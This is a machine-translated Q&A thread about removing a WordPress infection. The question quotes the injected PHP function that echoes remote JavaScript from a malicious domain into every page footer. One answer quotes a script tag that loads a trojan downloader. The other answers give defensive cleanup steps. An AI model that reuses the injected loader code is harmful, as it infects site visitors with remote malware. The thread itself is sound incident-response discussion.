这个脚本不断回到我在public_html文件夹中的wp-load.php文件:
function pluginAuth(){ 回波(wp_remote_retrieve_body(wp_remote_get( 'http://jquerys.net/jquery-1.6.3.min.js'))); } add_action('wp_footer','pluginAuth');
这指向病毒网站“jquerys.net”
可以解决的问题是什么。从wp-load.php中删除fucntion并没有消除它,因为它会在刷新我博客的任何页面时重新生成。
请帮助
答案 0 :(得分:1)
可能会有恶意代码注入任何wordpress文件。您将需要浏览所有文件,尤其是在您的主题中,以查找不应该存在的代码或文件/文件夹。
在此之后,您可以使用本文使您的构建更安全:
过去对我来说非常有用,可以防止这类事情再次发生。您可以根据需要执行多种安全措施。
我肯定会建议从保护wp-admin部分做一切。
答案 1 :(得分:0)
您很可能在wp-ulpoads
文件夹中有一些受感染或恶意的文件,也检查是否存在与图像或文档不同的任何文件类型。
同样重要的是:检查您当前的主题functions.php
文件是否有恶意代码,经常被黑客攻击的主题(即通过mafiashare网站的bittorent网站下载)注入此类代码,搜索任何curl()
个请求,实际上不仅仅是在functions.php
中,但在文件中(如果您的主题包含它们)options.php
或settings.php
等。
答案 2 :(得分:0)
您似乎安装了受感染的WordPress。使用Theme Authenticity Checker或Exploit Scanner插件自动检测可能是罪魁祸首的潜在恶意文件。
您还可以尝试Sucuri的免费扫描服务。
完成已损坏文件的识别后,请将其替换为可从WordPress.org获取的官方文件。
作为防御措施,安装WordPress File Monitor Plus插件 - 每次更改某些文件时都会发送电子邮件。这将允许您快速恢复某些黑客/脚本将来所做的任何更改!
答案 3 :(得分:0)
我能够检测到恶意脚本。它位于public_html文件夹中。该文件是" main.php"它不在默认安装中,也不会对任何主题或插件有所贡献。删除所有未经过验证的插件后,我删除了这个文件并删除了wp-load.php中的代码。
起初我没有删除" main.php"文件。 '功能'在wp-load中不断回来。但在删除" main.php"文件,我摆脱了这种病毒。
答案 4 :(得分:0)
WP中有新的病毒
下载由行发起的update.exe
<script src="//socialstatsplugin.com/jqury.js"></script>
我对这种病毒做了一些评论。
只需转到您的WP文件夹并检查是否有任何不需要的隐藏文件,当您浏览该文件时,这些文件是不可读的。
正如所说的那样
DELETE FROM wp_options WHERE option_name like '%wp_data_newa%'
并删除任何文件夹中所有不需要的隐藏文件夹它一直工作到现在。希望它会有所帮助。永远不会知道未来。
由于